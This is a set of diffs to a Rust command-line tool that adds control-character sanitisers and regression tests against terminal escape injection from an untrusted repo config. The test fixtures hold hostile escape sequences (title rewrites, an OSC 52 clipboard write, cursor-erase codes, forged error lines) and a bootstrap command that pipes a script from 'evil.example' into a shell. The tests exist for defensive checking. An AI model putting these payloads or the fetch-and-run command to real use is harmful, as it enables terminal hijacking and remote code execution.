+++ b/src/naming.rs
@@ -1516,9 +1516,9 @@ pub fn branch_pattern_warning(pattern: &str, repo: &str, types: &[BranchType]) -
 /// a **single row**.
 ///
 /// Config values come from a repo's `.gwm.toml`, and the commands that quote
-/// them — `gwm config get` / `list`, `gwm types`, `gwm aliases list`,
+/// them (`gwm config get` / `list`, `gwm types`, `gwm aliases list`,
 /// `gwm doctor`, `gwm config validate`, `gwm commit-prefix`, and the TOFU
-/// prompt itself — do not go through the trust gate, because inspecting a repo
+/// prompt itself) do not go through the trust gate, because inspecting a repo
 /// you have not vetted is meant to be the safe thing to do. Echoing the raw
 /// value would hand an untrusted `.gwm.toml` a terminal escape channel (an
 /// OSC 52 clipboard write, a title rewrite, cursor games). Same idiom as
@@ -1536,7 +1536,7 @@ pub fn sanitise_for_terminal(s: &str) -> String {
   s.chars().map(|c| if c.is_control() { '?' } else { c }).collect()
 }
 
-/// Neutralise control characters in output whose **shape is rows** — a `toml`
+/// Neutralise control characters in output whose **shape is rows**: a `toml`
 /// parse diagnostic with its caret-under-the-column snippet, or the raw
 /// `.gwm.toml` body the TOFU prompt shows on `show` (issue #473).
 ///
@@ -1573,7 +1573,17 @@ pub fn sanitise_diagnostic_for_terminal(s: &str) -> String {
 }
 
 pub fn sanitise_block_for_terminal(s: &str) -> String {
-  s.chars()
+  // A CRLF pair is a line ending, so it normalises to `\n` rather than losing
+  // its `\r` to a `?`. Windows writes config files, ledgers and process output
+  // that way, and marking every one of their line ends as suspicious would
+  // make the neutralisation itself look like the corruption.
+  //
+  // A LONE `\r` is not a line ending: it returns the cursor to column zero and
+  // lets what follows overwrite the line already printed, which is the one
+  // thing the margin rule exists to prevent. That one still goes.
+  let normalised = s.replace("\r\n", "\n");
+  normalised
+    .chars()
     .map(|c| {
       if c.is_control() && c != '\n' && c != '\t' {
         '?'

--- a/src/naming.rs
+++ b/src/naming.rs
@@ -1512,22 +1512,49 @@ pub fn branch_pattern_warning(pattern: &str, repo: &str, types: &[BranchType]) -
   ))
 }
 
-/// Neutralise control characters before echoing a config-supplied value.
+/// Neutralise control characters before echoing a config-supplied value on
+/// a **single row**.
 ///
-/// `branch_pattern` comes from a repo's `.gwm.toml`, and none of the commands
-/// that quote it — `gwm doctor`, `gwm config validate`, `gwm commit-prefix` —
-/// goes through the TOFU trust gate, because running them inside a repo you
-/// have not vetted is meant to be safe. Echoing the raw value would hand an
-/// untrusted `.gwm.toml` a terminal escape channel (an OSC 52 clipboard write,
-/// a title rewrite, cursor games). Same idiom as
+/// Config values come from a repo's `.gwm.toml`, and the commands that quote
+/// them — `gwm config get` / `list`, `gwm types`, `gwm aliases list`,
+/// `gwm doctor`, `gwm config validate`, `gwm commit-prefix`, and the TOFU
+/// prompt itself — do not go through the trust gate, because inspecting a repo
+/// you have not vetted is meant to be the safe thing to do. Echoing the raw
+/// value would hand an untrusted `.gwm.toml` a terminal escape channel (an
+/// OSC 52 clipboard write, a title rewrite, cursor games). Same idiom as
 /// [`crate::tui::wt_tree::sanitize_name`]: replace, don't strip, so the value
 /// stays recognisable and its length is not silently altered.
 ///
-/// `pub(crate)` rather than private because every site that quotes a
-/// config-supplied pattern has to use it; a second copy would be a second
-/// thing to forget.
-pub(crate) fn sanitise_for_terminal(s: &str) -> String {
+/// Line breaks are neutralised too, deliberately: a value that could emit a
+/// `\n` could forge an extra row in a report the user reads as a list of
+/// facts. Use [`sanitise_block_for_terminal`] for output that is *meant* to
+/// span rows.
+///
+/// Public because every site that echoes a config-supplied string has to use
+/// it, `main` included; a second copy would be a second thing to forget.
+pub fn sanitise_for_terminal(s: &str) -> String {
   s.chars().map(|c| if c.is_control() { '?' } else { c }).collect()
+}
+
+/// Neutralise control characters in output whose **shape is rows** — a `toml`
+/// parse diagnostic with its caret-under-the-column snippet, or the raw
+/// `.gwm.toml` body the TOFU prompt shows on `show` (issue #473).
+///
+/// Keeps `\n` and `\t`, which carry the layout, and replaces everything else
+/// including `\r` (which returns the cursor to column zero and lets a value
+/// overwrite the line it was printed on). Sanitising these is not "breaking
+/// raw": an escape sequence inside the body defeats the very inspection the
+/// `show` view exists to provide.
+pub fn sanitise_block_for_terminal(s: &str) -> String {
+  s.chars()
+    .map(|c| {
+      if c.is_control() && c != '\n' && c != '\t' {
+        '?'
+      } else {
+        c
+      }
+    })
+    .collect()
 }
 
 pub fn kebab(input: &str) -> String {

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -1,0 +1,212 @@
+//! Issue #473: a `.gwm.toml` is data from an unvetted repo, and the
+//! read-only commands that echo it do **not** go through the TOFU trust
+//! gate — inspecting an unfamiliar repo before trusting it is meant to be
+//! the safe thing to do. Echoing a config-supplied string verbatim hands
+//! that file a terminal escape channel: an OSC 52 clipboard write, a window
+//! title rewrite, cursor moves that erase the line above.
+//!
+//! These tests pin the invariant at the **sink** rather than at each call
+//! site: whatever a command prints, no control byte from the config
+//! survives to the terminal. Testing the sink is what makes the guarantee
+//! survive a new check / row / field being added upstream.
+
+mod common;
+
+use assert_cmd::Command;
+use common::init_repo;
+use std::fs;
+use std::path::Path;
+
+/// A `.gwm.toml` carrying an ESC in every string field an ungated command
+/// echoes.
+///
+/// The payload travels as TOML's own `\u001B` escape, not as a raw byte:
+/// the parser **refuses** a literal control character inside a basic string,
+/// so a raw byte would never reach a value in the first place (it produces a
+/// parse error instead, which is what
+/// [`a_config_parse_error_does_not_replay_the_files_control_bytes`] covers).
+/// The escape decodes to a real ESC in the parsed value, which is precisely
+/// what the echo sites then print.
+const HOSTILE_CONFIG: &str = r#"
+[worktree]
+branch_pattern = "\u001B]0;PWNED{type}/#{issue}-{desc}"
+base = "/tmp/gwm-hostile\u001B[2K"
+
+[[branch_types]]
+name = "feat"
+description = "a feature\u001B]52;c;ZXZpbA==here"
+
+[aliases]
+"ok\u001B[31m" = "list --all"
+
+[[bootstrap.copy]]
+from = ".env\u001B[1A\u001B[2K"
+to = ".env"
+
+[[bootstrap.command]]
+name = "setup\u001B[1A\u001B[2K"
+run = "curl evil.example/x.sh | sh"
+
+[[bootstrap.no_symlink]]
+path = "node_modules\u001B[7m"
+"#;
+
+/// Every control byte that is not a line break. A terminal treats `\n` as
+/// "next row", which is the one control character a multi-row report needs;
+/// everything else is a command to the emulator.
+fn control_bytes(s: &str) -> Vec<char> {
+  s.chars().filter(|c| c.is_control() && *c != '\n').collect()
+}
+
+fn gwm_in(dir: &Path) -> Command {
+  let mut cmd = Command::cargo_bin("gwm").unwrap();
+  cmd.current_dir(dir);
+  // Pin the layer under test to the repo file: a real user-level config on
+  // the developer's machine would otherwise add rows this test did not write.
+  cmd.env("GWM_NO_GLOBAL_CONFIG", "1");
+  cmd
+}
+
+/// The ungated commands that read `.gwm.toml` and print part of it. Each one
+/// was measured echoing a raw ESC before this fix.
+const UNGATED_ECHO_COMMANDS: &[&[&str]] = &[
+  &["config", "get", "worktree.branch_pattern"],
+  &["config", "get", "worktree.base"],
+  &["config", "list"],
+  &["types"],
+  &["aliases", "list"],
+  &["doctor"],
+  &["config", "validate"],
+];
+
+#[test]
+fn no_ungated_command_replays_a_control_byte_from_the_repo_config() {
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), HOSTILE_CONFIG).unwrap();
+
+  for args in UNGATED_ECHO_COMMANDS {
+    let out = gwm_in(dir.path()).args(*args).output().unwrap();
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    let stderr = String::from_utf8_lossy(&out.stderr);
+    assert!(
+      control_bytes(&stdout).is_empty(),
+      "`gwm {}` replayed {:?} from .gwm.toml on stdout:\n{:?}",
+      args.join(" "),
+      control_bytes(&stdout),
+      stdout
+    );
+    assert!(
+      control_bytes(&stderr).is_empty(),
+      "`gwm {}` replayed {:?} from .gwm.toml on stderr:\n{:?}",
+      args.join(" "),
+      control_bytes(&stderr),
+      stderr
+    );
+  }
+}
+
+#[test]
+fn a_neutralised_value_is_still_recognisable_in_the_output() {
+  // Replace rather than strip (the idiom already used by
+  // `tui::wt_tree::sanitize_name` and `naming::sanitise_for_terminal`): a
+  // value the user cannot recognise is a value they cannot act on, and a
+  // silently shortened one hides how much was removed.
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), HOSTILE_CONFIG).unwrap();
+
+  let out = gwm_in(dir.path())
+    .args(["config", "get", "worktree.branch_pattern"])
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    stdout.contains("]0;PWNED{type}/#{issue}-{desc}"),
+    "the pattern should stay readable minus its control bytes, got {:?}",
+    stdout
+  );
+  assert!(
+    stdout.contains('?'),
+    "the neutralised byte should leave a visible placeholder, got {:?}",
+    stdout
+  );
+}
+
+#[test]
+fn config_list_keeps_escaping_string_values() {
+  // `format_list_value` renders strings with `{:?}`, and Rust's `Debug` for
+  // `str` escapes control characters — so the *values* of `gwm config list`
+  // were never the hole (the keys were). That protection is incidental to a
+  // formatting choice, so pin it: "simplifying" `{:?}` to `{}` would reopen
+  // the channel silently.
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), HOSTILE_CONFIG).unwrap();
+
+  let out = gwm_in(dir.path()).args(["config", "list"]).output().unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    stdout.contains(r"\u{1b}"),
+    "string values should still come out Debug-escaped, got {:?}",
+    stdout
+  );
+}
+
+#[test]
+fn a_config_parse_error_does_not_replay_the_files_control_bytes() {
+  // A raw ESC byte cannot live inside a TOML basic string, so it never
+  // becomes a *value* — but `toml`'s parse error quotes the offending source
+  // line verbatim, which puts the byte on stderr anyway. That path is
+  // reachable from EVERY command that loads config, not only the ones that
+  // echo a value, so it is the widest leg of #473.
+  let (dir, _repo) = init_repo();
+  fs::write(
+    dir.path().join(".gwm.toml"),
+    "[worktree]\nbranch_pattern = \"\u{1b}]0;PWNED\"\n",
+  )
+  .unwrap();
+
+  let out = gwm_in(dir.path()).args(["config", "list"]).output().unwrap();
+  let stderr = String::from_utf8_lossy(&out.stderr);
+  assert!(
+    control_bytes(&stderr).is_empty(),
+    "the parse error replayed {:?} from the source line:\n{:?}",
+    control_bytes(&stderr),
+    stderr
+  );
+  // The diagnostic still has to be a diagnostic: line breaks are what make
+  // `toml`'s caret-under-the-column snippet readable, so they survive.
+  assert!(
+    stderr.lines().count() > 1,
+    "the snippet should keep its line breaks, got {:?}",
+    stderr
+  );
+}
+
+#[test]
+fn the_pre_trust_bootstrap_summary_neutralises_control_bytes() {
+  // The highest-severity site: this summary is printed immediately above
+  // `Trust this .gwm.toml? [y/N/show]:`, from a file the user has explicitly
+  // not trusted yet. `\u001B[1A\u001B[2K` moves the cursor up one row and
+  // erases it, so an unsanitised `[[bootstrap.command]]` name can delete the
+  // `run` line that the summary exists to reveal.
+  let cfg: gwm::config::Config = toml::from_str(HOSTILE_CONFIG).unwrap();
+  let lines = gwm::cli::bootstrap_summary_lines(&cfg);
+
+  let joined = lines.join("\n");
+  assert!(
+    control_bytes(&joined).is_empty(),
+    "the pre-trust summary replayed {:?}:\n{:?}",
+    control_bytes(&joined),
+    joined
+  );
+  // The command the user is being asked to authorise still has to be legible.
+  assert!(
+    joined.contains("curl evil.example/x.sh | sh"),
+    "the summary must still name the command, got {:?}",
+    joined
+  );
+  assert!(
+    joined.contains("node_modules"),
+    "the summary must still name the no-symlink target, got {:?}",
+    joined
+  );
+}

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -360,3 +360,115 @@ fn an_alias_expansion_cannot_smuggle_a_control_byte_through_clap() {
     );
   }
 }
+
+#[test]
+fn a_config_value_cannot_forge_a_line_in_an_error() {
+  // Errors are the one output path every command shares, and most of them
+  // quote something out of `.gwm.toml`. A value carrying a `\n` would
+  // otherwise print a second line that reads exactly like a gwm diagnostic,
+  // which is worse than a colour change: it is a false statement in gwm's
+  // own voice.
+  let (dir, _repo) = init_repo();
+  fs::write(
+    dir.path().join(".gwm.toml"),
+    "[[branch_types]]\nname = \"bad\\nerror: everything is fine\"\ndescription = \"x\"\n",
+  )
+  .unwrap();
+
+  let out = gwm_in(dir.path()).args(["config", "list"]).output().unwrap();
+  let stderr = String::from_utf8_lossy(&out.stderr);
+  // The forgery is a LINE in gwm's own voice, so count the lines that open
+  // like one. Asserting on the exact text would miss it: the forged row runs
+  // on into the rest of the real message.
+  let voiced = stderr.lines().filter(|l| l.starts_with("error: ")).count();
+  assert_eq!(voiced, 1, "a config value forged a diagnostic line:\n{:?}", stderr);
+  // Flattened, not dropped: the operator still needs to see what was rejected.
+  assert!(
+    stderr.contains("error: everything is fine"),
+    "the offending value should still be quoted, got {:?}",
+    stderr
+  );
+}
+
+#[test]
+fn a_rendered_diagnostic_keeps_the_lines_that_are_its_meaning() {
+  // The exemption the flattening above must not swallow. `toml` points at the
+  // broken column with a caret under it, across several lines; collapsing that
+  // would gut the one message whose entire job is to locate the problem.
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), "[worktree\nbase = 1\n").unwrap();
+
+  let out = gwm_in(dir.path()).args(["config", "validate"]).output().unwrap();
+  let stderr = String::from_utf8_lossy(&out.stderr);
+  assert!(
+    stderr.contains("\n  |\n"),
+    "the caret snippet should survive, got {:?}",
+    stderr
+  );
+  assert!(
+    control_bytes(&stderr).is_empty(),
+    "the exemption is for line breaks only, got {:?}",
+    control_bytes(&stderr)
+  );
+}
+
+#[test]
+fn the_forge_diff_rows_neutralise_control_bytes() {
+  // `milestones list` / `labels list` only reach their printers after a live
+  // forge round trip, so the rows are asserted as values. A milestone `title`
+  // is free text nothing validates on load; a label `name` is validated, but
+  // only against `is_ascii_control`, which lets the C1 range through.
+  use gwm::labels::{LabelSpec, RemoteLabel};
+  use gwm::milestones::{MilestoneSpec, MilestoneState, RemoteMilestone};
+
+  let esc = char::from(27u8);
+  let milestones = vec![MilestoneSpec {
+    title: format!("v1{}]0;PWNED.0", esc),
+    description: None,
+    due_on: None,
+    state: MilestoneState::Open,
+  }];
+  let mdiff = gwm::milestones::diff_milestones(
+    &milestones,
+    &[RemoteMilestone {
+      number: 7,
+      title: format!("stale{}[2K", esc),
+      description: None,
+      due_on: None,
+      state: MilestoneState::Open,
+    }],
+  );
+  let rows = gwm::cli::milestones_diff_lines(&format!("acme/repo{}[31m", esc), &milestones, &mdiff).join("\n");
+  assert!(
+    control_bytes(&rows).is_empty(),
+    "milestone rows replayed {:?}:\n{:?}",
+    control_bytes(&rows),
+    rows
+  );
+  assert!(
+    rows.contains("]0;PWNED.0"),
+    "the title must stay legible, got {:?}",
+    rows
+  );
+
+  let labels = vec![LabelSpec {
+    name: "bug".to_string(),
+    color: "d73a4a".to_string(),
+    description: None,
+  }];
+  let ldiff = gwm::labels::diff_labels(
+    &labels,
+    &[RemoteLabel {
+      name: format!("stale{}[2K", esc),
+      color: "ffffff".to_string(),
+      description: None,
+    }],
+  );
+  let rows = gwm::cli::labels_diff_lines(&format!("acme/repo{}[31m", esc), &labels, &ldiff).join("\n");
+  assert!(
+    control_bytes(&rows).is_empty(),
+    "label rows replayed {:?}:\n{:?}",
+    control_bytes(&rows),
+    rows
+  );
+}

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -61,6 +61,25 @@ fn control_bytes(s: &str) -> Vec<char> {
   s.chars().filter(|c| c.is_control() && *c != '\n').collect()
 }
 
+/// Render `s` as the body of a TOML basic string, with every control
+/// character as TOML's own `\uXXXX` escape.
+///
+/// Not `str::escape_default`, which emits Rust's `\u{9b}` form: TOML rejects
+/// the braces, so the fixture would not parse, alias loading would fail for
+/// the wrong reason, and the test would pass without ever exercising the path.
+/// That is exactly how the C1 gap below survived its first test.
+fn toml_escaped(s: &str) -> String {
+  s.chars()
+    .map(|c| {
+      if c.is_control() {
+        format!("\\u{:04X}", c as u32)
+      } else {
+        c.to_string()
+      }
+    })
+    .collect()
+}
+
 fn gwm_in(dir: &Path) -> Command {
   let mut cmd = Command::cargo_bin("gwm").unwrap();
   cmd.current_dir(dir);
@@ -333,19 +352,27 @@ fn trust_list_neutralises_a_decoded_origin() {
 fn an_alias_expansion_cannot_smuggle_a_control_byte_through_clap() {
   // `main` expands `[aliases]` into argv BEFORE clap parses it, and clap
   // prints its own error and exits without ever reaching the error sink in
-  // `main`. Measured, that is not a hole: clap strips control characters from
-  // the token it quotes, and the expander splits on whitespace so a `\n` in
-  // an expansion becomes a second token rather than a forged output line.
+  // `main`. That sink cannot cover this path, so the expansion is refused at
+  // the boundary instead: `aliases::validate_aliases` rejects any control
+  // character, alias loading then fails closed and falls back to raw argv.
   //
-  // Pinned rather than trusted, for the same reason `config list`'s `{:?}` is
-  // pinned: the protection belongs to a dependency's rendering choice, so a
-  // clap upgrade that starts echoing argv verbatim has to fail here rather
-  // than ship quietly.
+  // The first draft of this test sampled BEL and a newline, saw clap swallow
+  // both, and concluded the path was safe. It is not: clap strips the ASCII
+  // controls but leaves the C1 range, and `\u{9b}` (CSI) came out intact.
+  // So the cases below are chosen to span the classes rather than to be two
+  // plausible examples: C0, the whitespace C0 that could forge a row, DEL,
+  // and two C1 codes that ARE terminal control functions.
   let (dir, _repo) = init_repo();
-  for expansion in ["nope\u{7}bell", "nope\ninjected-line"] {
+  for expansion in [
+    "nope\u{7}bell",
+    "nope\ninjected-line",
+    "nope\u{7f}del",
+    "nope\u{85}nel",
+    "nope\u{9b}2K",
+  ] {
     fs::write(
       dir.path().join(".gwm.toml"),
-      format!("[aliases]\nboom = \"{}\"\n", expansion.escape_default()),
+      format!("[aliases]\nboom = \"{}\"\n", toml_escaped(expansion)),
     )
     .unwrap();
 

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -1,6 +1,6 @@
 //! Issue #473: a `.gwm.toml` is data from an unvetted repo, and the
 //! read-only commands that echo it do **not** go through the TOFU trust
-//! gate — inspecting an unfamiliar repo before trusting it is meant to be
+//! gate, because inspecting an unfamiliar repo before trusting it is meant to be
 //! the safe thing to do. Echoing a config-supplied string verbatim hands
 //! that file a terminal escape channel: an OSC 52 clipboard write, a window
 //! title rewrite, cursor moves that erase the line above.
@@ -156,7 +156,7 @@ fn a_neutralised_value_is_still_recognisable_in_the_output() {
 #[test]
 fn config_list_keeps_escaping_string_values() {
   // `format_list_value` renders strings with `{:?}`, and Rust's `Debug` for
-  // `str` escapes control characters — so the *values* of `gwm config list`
+  // `str` escapes control characters, so the *values* of `gwm config list`
   // were never the hole (the keys were). That protection is incidental to a
   // formatting choice, so pin it: "simplifying" `{:?}` to `{}` would reopen
   // the channel silently.
@@ -175,7 +175,7 @@ fn config_list_keeps_escaping_string_values() {
 #[test]
 fn a_config_parse_error_does_not_replay_the_files_control_bytes() {
   // A raw ESC byte cannot live inside a TOML basic string, so it never
-  // becomes a *value* — but `toml`'s parse error quotes the offending source
+  // becomes a *value*, but `toml`'s parse error quotes the offending source
   // line verbatim, which puts the byte on stderr anyway. That path is
   // reachable from EVERY command that loads config, not only the ones that
   // echo a value, so it is the widest leg of #473.
@@ -535,5 +535,73 @@ fn the_forge_diff_rows_neutralise_control_bytes() {
     "label rows replayed {:?}:\n{:?}",
     control_bytes(&rows),
     rows
+  );
+}
+
+#[test]
+fn doctor_keeps_the_toml_diagnostic_readable() {
+  // `check_config_parses` puts `toml`'s whole caret-under-the-column
+  // diagnostic in the check detail, and the first cut of the row sanitiser
+  // turned it into `?  |?1 | [worktree?` on the one command whose job is to
+  // help you recover. The rows survive; the margin is owned by the printer.
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), "[worktree\nbase = 1\n").unwrap();
+
+  let out = gwm_in(dir.path()).arg("doctor").output().unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    stdout.lines().filter(|l| l.trim_start().starts_with('|')).count() >= 2,
+    "the caret snippet should survive as rows, got {:?}",
+    stdout
+  );
+  assert!(
+    control_bytes(&stdout).is_empty(),
+    "doctor replayed {:?}",
+    control_bytes(&stdout)
+  );
+  // Every row of a multi-line detail stays under its check, so nothing the
+  // config wrote can pass for a check of its own.
+  assert!(
+    stdout.lines().all(|l| l.is_empty()
+      || l.starts_with(' ')
+      || l.starts_with('\u{2713}')
+      || l.starts_with('!')
+      || l.starts_with('\u{2717}')),
+    "a detail row escaped the margin, got {:?}",
+    stdout
+  );
+}
+
+#[test]
+fn a_crlf_line_ending_is_not_treated_as_an_escape() {
+  // Windows writes config files and ledgers with CRLF. Replacing the `\r` of
+  // every pair leaves a `?` at each line end, which makes the neutralisation
+  // itself look like the corruption it is there to prevent. A LONE `\r` is a
+  // different animal: it returns the cursor to column zero so what follows
+  // overwrites the row already printed, and that one still goes.
+  let dir = tempfile::TempDir::new().unwrap();
+  let ledger = dir.path().join("trust.toml");
+  fs::write(
+    &ledger,
+    "[[entries]]\r\norigin = \"git@example.com:acme/repo.git\"\r\nconfig_sha = \"abc123\"\r\ntrusted_at = \"2026-01-01T00:00:00Z\"\r\ntrusted_by = \"t\"\r\n",
+  )
+  .unwrap();
+
+  let out = Command::cargo_bin("gwm")
+    .unwrap()
+    .args(["trust", "show"])
+    .env("GWM_TRUST_LEDGER", &ledger)
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    !stdout.contains('?'),
+    "a CRLF line ending was marked as an escape:\n{:?}",
+    stdout
+  );
+  assert!(
+    control_bytes(&stdout).is_empty(),
+    "trust show replayed {:?}",
+    control_bytes(&stdout)
   );
 }

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -39,6 +39,9 @@ description = "a feature\u001B]52;c;ZXZpbA==here"
 [aliases]
 "ok\u001B[31m" = "list --all"
 
+[gitmoji]
+feat = "\u001B]0;PWNED:sparkles:"
+
 [[bootstrap.copy]]
 from = ".env\u001B[1A\u001B[2K"
 to = ".env"
@@ -208,5 +211,80 @@ fn the_pre_trust_bootstrap_summary_neutralises_control_bytes() {
     joined.contains("node_modules"),
     "the summary must still name the no-symlink target, got {:?}",
     joined
+  );
+}
+
+#[test]
+fn trust_show_neutralises_control_bytes_in_the_ledger() {
+  // `trust show` prints the ledger verbatim, and a ledger row records an
+  // origin key: a remote URL, which arrived with a clone like everything else
+  // here. The block variant applies, so the rows survive as rows and only the
+  // control bytes go.
+  let dir = tempfile::TempDir::new().unwrap();
+  let ledger = dir.path().join("trust.toml");
+  std::fs::write(
+    &ledger,
+    "[[entry]]\norigin = \"git@example.com:acme/repo\u{1b}]0;PWNED.git\"\nsha = \"abc\"\n",
+  )
+  .unwrap();
+
+  let out = Command::cargo_bin("gwm")
+    .unwrap()
+    .args(["trust", "show"])
+    .env("GWM_TRUST_LEDGER", &ledger)
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    control_bytes(&stdout).is_empty(),
+    "trust show replayed {:?} from the ledger:\n{:?}",
+    control_bytes(&stdout),
+    stdout
+  );
+  // A document, not a row: the ledger's own line breaks are its shape.
+  assert!(
+    stdout.contains("origin = ") && stdout.contains("sha = "),
+    "the ledger should still render as rows, got {:?}",
+    stdout
+  );
+}
+
+#[test]
+fn commit_prefix_neutralises_control_bytes_from_the_gitmoji_table() {
+  // `commit-prefix` needs its own fixture: it only reaches its printer when
+  // the branch matches `branch_pattern`, and no git-legal branch can match a
+  // pattern that starts with an ESC. So the pattern here is benign and the
+  // payload sits in `[gitmoji]`, which is where this command reads from.
+  //
+  // The command is ungated and runs constantly: shell prompts call it on
+  // every prompt draw, and the bundled commit-msg hook on every commit, in
+  // whatever repo the user happens to be sitting in.
+  let (dir, _repo) = init_repo();
+  fs::write(
+    dir.path().join(".gwm.toml"),
+    "[gitmoji]\nfeat = \"\\u001B]0;PWNED:sparkles:\"\n",
+  )
+  .unwrap();
+
+  let out = gwm_in(dir.path())
+    .args(["commit-prefix", "--branch", "feat/#1-hostile"])
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    out.status.success(),
+    "the command has to reach its printer for this to test anything: {:?}",
+    String::from_utf8_lossy(&out.stderr)
+  );
+  assert!(
+    control_bytes(&stdout).is_empty(),
+    "commit-prefix replayed {:?} from [gitmoji]:\n{:?}",
+    control_bytes(&stdout),
+    stdout
+  );
+  assert!(
+    stdout.contains("]0;PWNED:sparkles:"),
+    "the shortcode should stay readable minus its control bytes, got {:?}",
+    stdout
   );
 }

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -375,16 +375,52 @@ fn a_config_value_cannot_forge_a_line_in_an_error() {
   )
   .unwrap();
 
-  let out = gwm_in(dir.path()).args(["config", "list"]).output().unwrap();
+  assert_one_voiced_line(dir.path());
+
+  // The harder shape, and the one a per-variant rule could not reach: `toml`
+  // names an unknown field using the key the repo WROTE, newline and all,
+  // inside the very message that also carries the caret snippet. Generated
+  // layout and untrusted value in one string, which is why the fix owns the
+  // left margin instead of trying to tell them apart.
+  fs::write(
+    dir.path().join(".gwm.toml"),
+    "[worktree]\n\"bad\\nerror: forged by the repo\" = 1\n",
+  )
+  .unwrap();
+  assert_one_voiced_line(dir.path());
+}
+
+/// Run `config list` in `dir` and assert exactly one line opens in gwm's voice.
+fn assert_one_voiced_line(dir: &Path) {
+  let out = gwm_in(dir).args(["config", "list"]).output().unwrap();
   let stderr = String::from_utf8_lossy(&out.stderr);
-  // The forgery is a LINE in gwm's own voice, so count the lines that open
-  // like one. Asserting on the exact text would miss it: the forged row runs
-  // on into the rest of the real message.
-  let voiced = stderr.lines().filter(|l| l.starts_with("error: ")).count();
-  assert_eq!(voiced, 1, "a config value forged a diagnostic line:\n{:?}", stderr);
-  // Flattened, not dropped: the operator still needs to see what was rejected.
+  // Count the lines at column zero. gwm writes exactly two here, one per
+  // `eprintln!`: the alias-loading warning and the error itself, both of which
+  // fail on the same broken config. Everything else has to sit under the
+  // margin, so a third column-zero line means the repo wrote one.
+  //
+  // Counting beats matching the forged text: the forgery runs on into the rest
+  // of the real message, so `l == "error: everything is fine"` never matches
+  // even when the line is there. That exact mistake made this test pass
+  // against the defect on its first draft.
+  let at_margin: Vec<&str> = stderr
+    .lines()
+    .filter(|l| !l.is_empty() && !l.starts_with("  "))
+    .collect();
+  assert_eq!(
+    at_margin.len(),
+    2,
+    "a config value forged a line at column zero:\n{:?}",
+    stderr
+  );
   assert!(
-    stderr.contains("error: everything is fine"),
+    at_margin[0].starts_with("warning: ") && at_margin[1].starts_with("error: "),
+    "the two column-zero lines should be gwm's own, got {:?}",
+    at_margin
+  );
+  // Indented, not dropped: the operator still needs to see what was rejected.
+  assert!(
+    stderr.contains("error: everything is fine") || stderr.contains("error: forged by the repo"),
     "the offending value should still be quoted, got {:?}",
     stderr
   );
@@ -392,22 +428,24 @@ fn a_config_value_cannot_forge_a_line_in_an_error() {
 
 #[test]
 fn a_rendered_diagnostic_keeps_the_lines_that_are_its_meaning() {
-  // The exemption the flattening above must not swallow. `toml` points at the
-  // broken column with a caret under it, across several lines; collapsing that
-  // would gut the one message whose entire job is to locate the problem.
+  // What the margin rule has to leave intact. `toml` points at the broken
+  // column with a caret under it, across several lines; flattening that would
+  // gut the one message whose entire job is to locate the problem. Keeping the
+  // line breaks is only safe BECAUSE every one of them lands under gwm's
+  // margin, which is what the previous test pins.
   let (dir, _repo) = init_repo();
   fs::write(dir.path().join(".gwm.toml"), "[worktree\nbase = 1\n").unwrap();
 
   let out = gwm_in(dir.path()).args(["config", "validate"]).output().unwrap();
   let stderr = String::from_utf8_lossy(&out.stderr);
   assert!(
-    stderr.contains("\n  |\n"),
-    "the caret snippet should survive, got {:?}",
+    stderr.lines().filter(|l| l.trim_start().starts_with('|')).count() >= 2,
+    "the caret snippet should survive as its own rows, got {:?}",
     stderr
   );
   assert!(
     control_bytes(&stderr).is_empty(),
-    "the exemption is for line breaks only, got {:?}",
+    "line breaks are the only control character spared, got {:?}",
     control_bytes(&stderr)
   );
 }

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -288,3 +288,75 @@ fn commit_prefix_neutralises_control_bytes_from_the_gitmoji_table() {
     stdout
   );
 }
+
+/// A ledger whose `origin` carries an ESC. It travels as TOML's escape, which
+/// is exactly the point: `trust show` cats the file and sees harmless text,
+/// but `TrustLedger::load` DECODES it, so every command that reads the ledger
+/// back through the struct handles the real control character.
+const HOSTILE_LEDGER: &str = concat!(
+  "[[entries]]\n",
+  "origin = \"git@example.com:acme/repo",
+  r"\u001B",
+  "]0;PWNED.git\"\n",
+  "config_sha = \"abc123def456789\"\n",
+  "trusted_at = \"2026-01-01T00:00:00Z\"\n",
+  "trusted_by = \"someone@somewhere\"\n",
+);
+
+#[test]
+fn trust_list_neutralises_a_decoded_origin() {
+  let dir = tempfile::TempDir::new().unwrap();
+  let ledger = dir.path().join("trust.toml");
+  fs::write(&ledger, HOSTILE_LEDGER).unwrap();
+
+  let out = Command::cargo_bin("gwm")
+    .unwrap()
+    .args(["trust", "list"])
+    .env("GWM_TRUST_LEDGER", &ledger)
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    control_bytes(&stdout).is_empty(),
+    "trust list replayed {:?} from a decoded origin:\n{:?}",
+    control_bytes(&stdout),
+    stdout
+  );
+  assert!(
+    stdout.contains("git@example.com:acme/repo"),
+    "the origin must stay auditable, got {:?}",
+    stdout
+  );
+}
+
+#[test]
+fn an_alias_expansion_cannot_smuggle_a_control_byte_through_clap() {
+  // `main` expands `[aliases]` into argv BEFORE clap parses it, and clap
